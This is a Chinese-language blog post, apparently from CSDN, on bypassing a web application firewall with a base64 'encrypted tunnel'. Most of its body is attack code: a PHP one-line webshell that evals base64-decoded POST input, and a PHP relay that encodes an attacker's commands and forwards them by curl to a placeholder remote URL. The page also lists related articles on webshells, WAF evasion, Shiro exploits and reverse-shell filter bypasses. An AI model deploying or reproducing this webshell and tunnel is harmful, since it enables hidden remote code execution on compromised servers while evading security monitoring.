加密隧道绕过WAF

最新推荐文章于 2025-03-23 12:52:12 发布
最新推荐文章于 2025-03-23 12:52:12 发布
阅读量678 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: Hacker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/killapper/article/details/46398943

一下采用base64编码使WAF无法识别接收内容从而达到目的,在必要的情况下发送也要进行编码防止WAF检测到

server
<?php if($_POST['c']!='') @eval(base64_decode($_POST[z0]));
?>
tunnel
<?php
$handle=curl_init();
$DATA=array();
$DATA=$_POST;
$DATA['c']=base64_encode(substr($DATA['c'],1));
curl_setopt($handle,CURLOPT_URL,'http://xxx/xxx.php');
curl_setopt($handle,CURLOPT_HEADER,0);
curl_setopt($handle,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($handle,CURLOPT_POST,1);
curl_setopt($handle,CURLOPT_POSTFIELDS,$DATA);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1");
//curl_setopt($ch, CURLOPT_PROXYPORT, 1080);
$output=curl_exec($handle);
if($output === FALSE) {
    echo "cURL Error: " . curl_error($handle);
}
echo ($output);
curl_close($handle);
?>


一句话木马汇总:Web 安全中的隐形杀手,揭秘其关键函数、绕过 WAF 及防火墙的技巧
浩策盾悟
03-21 8421
一句话木马是一种简短的恶意代码,通常用于 Web 渗透中,通过利用漏洞在服务器上执行任意命令。以下按编程语言详细说明其关键函数和作用。
第47天-WAF绕过-漏洞发现之代理池指纹被动探针
MCTSOG的博客
04-09 878
思维导图 #漏洞发现触发 WAF 点-针对 xray,awvs 等 1.扫描速度-(代理池,延迟,白名单等) 2.工具指纹-(特征修改,伪造模拟真实用户等) 3.漏洞 Payload-(数据变异,数据加密,白名单等) 案例演示: 代理池 Proxy_pool 项目搭建及使用解释 Proxy_pool —github地址 https://github.com/jhao104/proxy_pool 需要搭配redis数据库自行安装! 设置 安装需要的库文件 pip install -r requiremen
看牛人怎么突破WAF防御(1)
weixin_33720452的博客
03-14 232
2019独角兽企业重金招聘Python工程师标准>>> ...
脏数据绕过waf,Yakit爆破base64编码密码,ssh无密码登录受害主机
qq_45953122的博客
10-18 1280
编码后抓到包以后进行爆力破解时会遇到一个问题,抓到的密码是base64编码之后的密码,不能对其进行明文密码的爆破。现在我们要实现ssh免密码登录,ssh采用的是非对称加密的,一旦把自己的公钥写进受害者服务器的ssh目录里时,就可以做到不需要密码进行ssh连接。现在说一下客户对其编码的问题,客户在前端做了一个base64加密,在后端进行了base64解密。选中admin,右击 --> 插入标签/字典 --> 插入模糊测试字典查询。账号明文密码在互联网上进行传输,属于低危漏洞,抓到包以后能对其进行爆破。
shiro漏洞工具简单配置
m0_59757868的博客
07-12 3161
工具地址:https://github.com/feihong-cs/ShiroExploit使用环境:java8运行命令:java -jar ShiroExploit.jar当然工具中默认配置的有对应的域名和token值,如果当访问的人过多时,难免会有一些问题导致检测不准确,这里可以自己手动配置自己对应的域名和token值。打开config目录下的config/config.properties文件,内容为 rememberMeCookieName=rememberMe ceyeDomain=xxxxx
Shiro框架漏洞分析与复现
qq_53058639的博客
03-06 1928
ApacheShiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性,可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的Web 和企业应用程序。
2025年渗透测试面试题总结-某360-企业蓝军面试复盘 (题目+回答)
soc的博客
03-23 1104
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
网络安全防护:开源WAF雷池SafeLine本地部署与配置全流程
m0_73879806的博客
02-15 1882
对于建站新手来说,无论你选择创建的是个人博客、企业官网还是各类应用平台来推广自己的内容或是产品,都已经是现在这个时代非常简单快捷的一种解决方案了。然而,在享受便捷的同时,我们不得不面对一个严峻的事实:网络安全威胁如影随形。你可能以为自己搭建的网站或应用程序上线后会立刻吸引到热情洋溢的新用户,但实际上,最先光顾这些新站点的往往不是满怀期待的访客,而是那些带着恶意企图、技术高超的黑客。他们像潜伏在暗处的猎手一样伺机而动,一旦发现漏洞便迅速发起攻击。面对这样的挑战,我们不能坐以待毙!
大部分采用的是什么加密算法,有什么优缺点
02-19
通常,为了绕过WAF或静态检测,攻击者会使用Base64、AES、异或加密、RC4和自定义算法等。这些加密算法各有优缺点,需要分别解释。 然后,用户可能想知道这些加密方法的优缺点,以及它们在实战中的应用场景。例如,...
shell反弹中/被屏蔽
最新发布
06-19
2.引用[2]和[4]提到使用通配符绕过WAF,例如使用`/???/?c`来代替`/bin/nc`,因为通配符可以匹配到正确的路径(如/bin/nc)。3.引用[5]提到使用dnscat2,这是一种通过DNS协议进行通信的工具,可以绕过一些防火墙限制...
【渗透测试】Apache Shiro系列漏洞
weixin_53972936的博客
11-01 4030
Apache Shiro框架是一个功能强大且易于使用的 Java 安全框架,它执行身份验证、授权、加密和会话管理。借助 Shiro 易于理解的 API,您可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的 Web 和企业应用程序。
Shiro 权限绕过漏洞分析(CVE-2020-1957)
TOPHANT的博客
08-05 1932
1## 前言 2020年3月23号,Shiro开发者Brian Demers在用户社区发表帖子,提醒shiro用户进行安全更新,本次更新进行了三个修复,其中就包括了对编号为CVE-2020-1957的Shrio授权绕过漏洞的修复。漏洞影响shiro 1.5.2版本以下。 分析过程 SHIRO-682 根据Shiro开发者在1.5.2版本中提交的commit中关于PathMatchingFilter类的测试用例,可以直接关联到JIRA issueSHIRO-682,该issue在1.5.0版本中.
shiro权限绕过
人若有志,就不会在半坡停止。
11-08 2251
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。
shiro重写权限返回函数返回json_CVE202011989:Apache Shiro权限绕过复现
weixin_39753857的博客
11-27 211
上方蓝色字体关注我们,一起学安全!作者:hatjwe@Timeline Sec本文字数:1142阅读时长:3~4min声明:请勿用作违法用途,否则后果自负0x01 简介Apache Shiro作为常用的Java安全框架,拥有执行身份验证、授权、密码和会话管理等功能,通常会和Spring等框架一起搭配使用来开发Web应用。0x02 漏洞概述编号:CVE-2020-11989Apache S...
渗透测试之waf绕过基础
qi_SJQ_的博客
01-28 4104
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 思维导图 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 思维导图: 一、信息收集 此处只针对对于目标网站直接扫描的信息收集讲解,其他辅助信息收集手段如:查旁站/识别cms等手段也不会遇到waf拦截。 1.安全狗—防ddos cenos目前用的不熟练,于是我将服务器系统换成了winserver,搭建上web环境和安全狗,打开cc拦截开关,本地.
Apache Struts 修复 OGNL 技术中可能存在的 RCE 缺陷
smellycat000的专栏
12-11 427
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队Apache 软件基金会发布 Struts 2 安全更新,修复了一个和 OGNL 技术相关的“很可能存在的远程代码执行“缺陷...
深入了解SQL注入绕过waf和过滤机制
kendyhj9999的专栏
06-06 5669
深入了解SQL注入绕过waf和过滤机制 来源:http://drops.wooyun.org/tips/968 16人收藏 收藏 2014/03/02 13:24 | r00tgrok | 技术分享 | 占个座先 知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filte
Waf 基本功能
热门推荐
何进的博客
02-24 1万+
一、    Web防护 1.1   网络层防护 1)DDOS攻击 2)Syn Flood 3)Ack Flood 4)Http/HttpS Flood(CC攻击) 5)慢速攻击 1.2   应用层防护和功能 1)URL黑白名单 2)HTTP协议规范(包括特殊字符过滤、请求方式、内容传输方式,例如:multipart/form-data,text/xml,application/x
WAF的工作原理和绕过浅析
谢公子的博客
12-12 1万+
目录 WAF WAF的判断 WAF的工作原理 基于规则库匹配的WAF WAF绕过 域名转换为ip WAF解析HTTP请求阶段绕过 分块编码(Transfer-Encoding)绕过WAF 其他 WAF匹配规则阶段绕过 利用溢量数据绕过WAF 其他 结语 WAF 在实际的渗透测试过程中,经常会碰到网站存在WAF的情况。网站存在WAF,意味着我们不能使用安全工具对网站进...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值